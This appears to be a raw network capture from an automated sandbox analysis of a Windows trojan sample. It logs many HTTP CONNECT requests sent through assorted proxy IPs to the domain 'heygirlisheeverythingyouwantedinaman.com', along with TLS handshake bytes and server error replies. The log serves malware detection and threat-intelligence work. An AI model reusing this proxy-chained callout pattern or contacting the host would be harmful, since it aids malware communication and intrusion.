                                                                                Feb 23, 2024 14:28:23.600070953 CET1286INData Raw: 69 c3 b3 6e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e
                                                                                Data Ascii: in</button> </div> </div> </div> </div> <div class="p-3 d-flex justify-content-center mt-5" style="background-color: rgba(0, 0, 0, -0.9);width: 400px; margin-left:auto;margin-r
                                                                                Feb 23, 2024 14:28:23.600078106 CET298INData Raw: 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6c 6f 67 69
                                                                                Data Ascii: <script src="static/src/js/main.js"></script> <script src="static/src/js/login.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootstrap-tour.min.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootst
                                                                                Feb 23, 2024 14:28:23.600152969 CET202OUTData Raw: 16 03 03 00 c5 01 00 00 c1 03 03 65 d8 9d 76 6c f5 1f fb 96 b8 59 0d f1 00 34 47 7c c8 7a 71 68 27 e3 e2 b0 63 7c af 42 d4 73 1b 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: evlY4G|zqh'c|Bs*,+0/$#('=<5/n-+(heygirlisheeverythingyouwantedinaman.com#
                                                                                Feb 23, 2024 14:28:23.851063967 CET494INHTTP/1.1 400 Bad Request
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Server: Apache/2.4.56 (Ubuntu)
                                                                                Content-Length: 312
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 67 72 2e 66 75 74 75 72 61 31 30 30 2e 63 6f 6d 2e 70 79 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Ubuntu) Server at agr.futura100.com.py Port 80</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                175192.168.2.849924209.145.56.5164325828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.349877119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.382358074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382987976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.383126020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.382421970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:59.397914886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:11.397834063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                176192.168.2.850797162.243.102.20797645828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.361008883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                177192.168.2.850716141.94.174.6133265828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.367575884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                178192.168.2.850801172.67.182.102805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.371898890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.459657907 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                179192.168.2.849932174.75.211.22241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.372620106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                180192.168.2.850805104.19.235.10805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.372769117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.460067034 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                181192.168.2.850820104.16.195.74805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.382637978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.469846964 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                182192.168.2.850836134.122.26.11805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.395821095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.694700003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.007251024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.616641998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.991821051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.288670063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.491911888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.991822004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.882581949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                183192.168.2.85075768.1.210.18941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.396953106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                184192.168.2.850726113.30.149.76805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.399709940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                185192.168.2.849941174.77.111.19641455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.414660931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                186192.168.2.850784132.148.244.30449575828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.414663076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.835352898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.272866011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.147903919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882667065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.695207119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.491938114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.992175102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.991995096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                187192.168.2.85075851.75.125.208150845828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.414949894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.866600037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.366648912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.491766930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.499449968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.491978884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.492214918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                188192.168.2.850733164.163.21.1482915828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.416699886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                189192.168.2.8506098.213.128.680805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.417768002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.729356050 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                190192.168.2.850736212.127.93.18580815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.419789076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                191192.168.2.85059427.65.30.3710805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.452094078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                192192.168.2.850831199.229.254.12941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.454174995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                193192.168.2.850861104.22.50.220805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.462970972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.550426006 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                194192.168.2.85079182.223.121.72543685828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.470921993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.975969076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.601053953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.991956949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.491945028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.991920948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.492724895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.492392063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.491822958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                195192.168.2.8498791.1.104.7099995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.471142054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.491761923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.853214025 CET823INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Server: Apache/2.4.48 (Unix)
                                                                                Content-Length: 633
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
